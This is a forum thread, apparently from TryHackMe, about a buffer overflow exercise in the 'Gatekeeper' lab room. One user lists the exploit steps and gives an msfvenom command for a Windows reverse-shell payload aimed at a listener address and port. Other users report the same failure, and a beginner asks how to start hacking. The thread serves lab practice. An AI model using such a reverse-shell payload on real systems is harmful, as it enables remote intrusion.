Hey I was wondering if anyone might be able to help me with the gatekeeper room, I am having some difficulty getting a reverse shell for the BOF. I can capture the EIP, get the offset, Ive identified the bad characters and gotten the jmp address. I set a break point there and it all worked. So I am thinking there must be something wrong with my payload. I cant get it to pop calc.exe either. Ive used both my local kali and the THM attack box with the same results. This is the msfvenom I am using to generate the reverse shell msfvenom -p windows/shell_reverse_tcp LHOST=10.10.21.183 LPORT=4444 EXITFUNC=thread -b "\x00\x0a" -f c any suggestions as to what I am doing wrong. Thanks!

You are the the second person this week who has said they cannot get a reverse shell in gatekeeper despite being confident in the payload. I also could not get a shell so that makes 3. I think something is wrong with the room...

YOOO

I WANNa learn hacking plz

If you think hacking requires some "magic" tricks you're mistaken. It's hard often tedious. All you need is motivation. Go take a beginner pathway and complete it without using any walkthroughs.

and what logicial i should work on

like kali linux?

@cobalt sandal

You mean OS? Kali / Parrot but Kali is imo better